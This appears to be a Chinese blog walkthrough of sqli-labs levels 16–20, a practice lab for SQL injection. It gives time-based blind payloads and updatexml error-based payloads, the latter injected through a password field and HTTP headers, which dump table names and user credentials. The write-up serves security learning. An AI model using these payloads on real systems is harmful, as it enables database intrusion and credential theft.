首页 > 数据库 >sqlilabs less16-20关手工注入

sqlilabs less16-20关手工注入

时间:2024-08-21 18:51:35浏览次数:14  
标签:20 sqlilabs name select updatexml less16 table concat schema

第16关

一.判断闭合方式

闭合方式点“)

admin")and1=1#

二.判断数据库长度

admin") and if(length(database())>7, 0, sleep(5))#

页面无延迟 

admin") and if(length(database())>8, 0, sleep(5))#

 

页面有延迟说明数据库长度为8

三.判断数据库的第一个字符

admin") and if(ascii(substr(database(),1,1))>114, 0, sleep(5))#

页面无延迟

admin") and if(ascii(substr(database(),1,1))>115, 0, sleep(5))#

 

页面有延迟说明数据库第一个字符为‘s’

........

最终得出数据库为security

四.判断数据库的表名

admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>117, 0, sleep(5))#

说明数据库表名第一个字符为‘u’

.......

最终得出第一张表为users

五.判断表中的字段

admin") and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>105, 0, sleep(5))-- -

页面有延迟说明表中的第一个字段为‘e'

.......

以此类推可得出所有

第17关

 一判断闭合点

发现只有用户名采用了过滤函数,  修改的密码并没有过滤;所以利用密码进行报错注入

1’ and 1=1;

二. 查询数据库

1'or updatexml(1,concat('~', database(), '~'),0) #

 

 二.查询数据库下的所有表

1'or updatexml(1,concat('~', (select group_concat(table_name) from information_schema.tables where table_schema=database()), '~'),3) #

三.查询user表中的所有列

1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users'),'~'),1)#

 

四.查询所有数据

1' and updatexml(1,concat('~',(select group_concat(username,password) from users),'~'),1)#

 

第18关

利用urp Suite 抓包,在Referer后面进行注入测试

一.判断闭合点

闭合点为1'and

二.查询数据库

updatexml(1, concat(1, database ()), 1)and'

三.查表名

1'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)and' 

 

四.查列名

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'

 

五.查看users表中所有信息 

1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'

第19关

与第18关同理

一.判断闭合点

闭合方式为'and'

 

二.查数据库

'and updatexml(1,concat(1,database()),1)and'

 

三.查表名

1'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)and'

 

四.查列名

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) and'

 

五.查看users表中所有信息

1' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)and'

 

第20关

一.判断闭合方式

闭合方式为'--+

二.查数据库

'and updatexml(1,concat(1,database()),1)--+

 

三.查表名

'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

 

四.查列名

' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

五.查看users表中所有信息

' and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)--+

 

标签:20,sqlilabs,name,select,updatexml,less16,table,concat,schema
From: https://blog.csdn.net/m0_75036923/article/details/141395386

相关文章

  • CF 2001 E2 solution (967 Div.2)
    CF2001E2由于对称,所以设\(heap[u]\)为两次确定堆,且第一次弹出的是\(u\),\(heap[u,v]\)是第一次\(u\),第二次\(v\)则答案就是\(\sumheap[u]=2^{n-1}·heap[x]\)其中\(x\)任意。不妨我们考虑第一次都是从第一个叶子弹出,那么对于其他不同的第二个弹出的点,根据对称性......
  • 信息学奥赛初赛天天练-71-NOIP2016普及组-基础题2-进制转换、二进制转八进制、八进制
    NOIP2016普及组基础题24以下不是CPU生产厂商的是()AIntelBAMDCMicrosoftDIBM8与二进制小数0.1相等的八进制数是()A0.8B0.4C0.2D0.19以下是32位机器和64位机器的区别是()A显示器不同B硬盘大小不同C寻址......
  • [题解]P2444 [POI2000] 病毒
    P2444[POI2000]病毒题目核心是多模式匹配,所以考虑用对所有模式串建立AC自动机。我们把自动机上,存在一个模式串作为前缀的节点,称作“危险节点”。如果无限长的安全代码存在的话,匹配过程中Trie图上一定有节点会经过多次,即存在环;而且经过的所有节点都不是“危险节点”,否则就包含......
  • 2024年十大聊天机器人构建平台
    聊天机器人现在在客户服务和业务自动化中扮演着至关重要的角色,这项技术允许企业与客户快速实时地互动。用于创建聊天机器人的技术正在迅速发展,这对聊天机器人构建工具产生了直接影响。一些领先者中的先驱者在2024年正在推出具有革命性特点和界面的产品。本文介绍了顶级聊天机器......
  • 2024年8大图片转pdf软件免费推荐,轻松将图片转为PDF!
    图片转pdf软件该怎么挑选呢?市面上的PDF处理工具多如牛毛,让我们难以抉择。其实我们可以根据软件的功能特点及突出功能效果,再结合自身实际运用场景来挑选最适合自己的图片转pdf工具。今天小编将结合市面上广为熟悉的PDF编辑软件,分别详细讲解它们的兼容系统、产品功能、软件优点......
  • AMD E1-1200可以用作nas服务器吗
    AMDE1-1200处理器在技术上可以用作NAS(网络附加存储)服务器的CPU,但其性能和适用场景需要仔细考虑。适用性评估性能特点:AMDE1-1200是一款低功耗的APU(加速处理单元),集成了CPU和GPU功能。它的主频较低,适合轻度办公和日常使用,如上网、写作、看视频等。在处理NAS的基本任务,如文......
  • YSP_refs_cn_2009_其他
    rhTNFR-Fc中文文献-2009-其他 探索适应症外 随机对照试验[1][1]田静,陈进伟,高洁生,等.甲氨蝶呤联合重组人Ⅱ型肿瘤坏死因子受体-抗体融合蛋白治疗严重未分化脊柱关节病的短期疗效观察.中国现代医学杂志,2009,19(11):1692-1695.浏览文摘 病例对照[2][2]赵......
  • P1972 [SDOI2009] HH的项链 题解
    前言这是一篇分块题解,大概的思路洛谷的题解里的巨佬讲的很清楚(我的思路其实和大佬的差不多),可以去看看qaq。因为苯人为了卡常魔改代码,所以在本题解的中间具体步骤展示部分仅展示魔改前的代码(也就是被卡常但是好看一点的代码),魔改后的代码(100pts)在文章最末展示。题意题面传送门......
  • 2024最新FL Studio24.1.1中文版新功能全解析,创作更高效!
    大家好呀,作为一个资深的音乐爱好者和制作人,今天我要安利一个我最近超级痴迷的数字音频工作站软件——FLStudio24.1.1中文版。这款产品可是让我的音乐创作之路如虎添翼,快来跟我一起看看它的炫酷功能吧!......
  • 北京劳保展-2025年中国劳动保护用品展览交易会-参展报名处
    2025北京劳保展,作为行业的重要交流平台,将为您提供无限商机。这里有最前沿的劳保理念,最先进的防护设备,最广泛的合作机会。无论您是劳保用品的制造商、经销商,还是致力于提升劳动保护水平的专业人士,这里都有您的一席之地。  2025北京劳保展,将为您呈现最全面的劳保产品,最先进的......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99